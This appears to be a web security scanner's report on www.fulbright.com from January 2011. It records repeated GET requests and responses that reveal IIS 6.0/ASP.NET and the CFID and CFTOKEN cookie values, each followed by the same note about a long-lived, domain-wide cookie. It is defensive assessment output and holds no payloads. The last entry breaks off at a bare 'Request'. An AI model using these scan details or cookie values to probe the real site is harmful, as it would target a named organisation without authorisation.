GET /Austin HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:53:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A53%3A25%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1830%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:53:25 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Denver HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:53:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A53%3A54%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1974%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:53:54 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /London HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A28%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2108%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:28 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /LosAngeles HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A45%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2193%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:45 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Minneapolis HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A54%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2239%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:54 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Riyadh HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:56:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A56%3A29%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2679%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:56:29 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /aboutus HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A57%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D190%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:57 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /alumni HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A23%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D435%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:23 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /aop HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:50:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A50%3A28%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D934%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:50:28 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /careers HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Wed, 19 Jan 2011 15:49:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A07%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D268%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:07 GMT;path=/ location: http://www.joinfulbright.com Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dc/x22 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A35%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D5%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/ Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /downloads HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A58%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D752%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:58 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dubai HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A04%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2016%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:04 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A48%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:56 GMT;path=/ Content-Type: text/html; charset=UTF-8
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /index.cfm HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFCLIENT_WWW2=recentsearch%3D%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A35%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D6%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /industries HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:50:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A50%3A42%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D995%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:50:42 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /insite HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A52%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D157%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:52 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /international HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:52:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A52%3A43%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1606%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:52:43 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jblount HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:52:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A52%3A19%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1481%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:52:19 GMT;path=/ Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
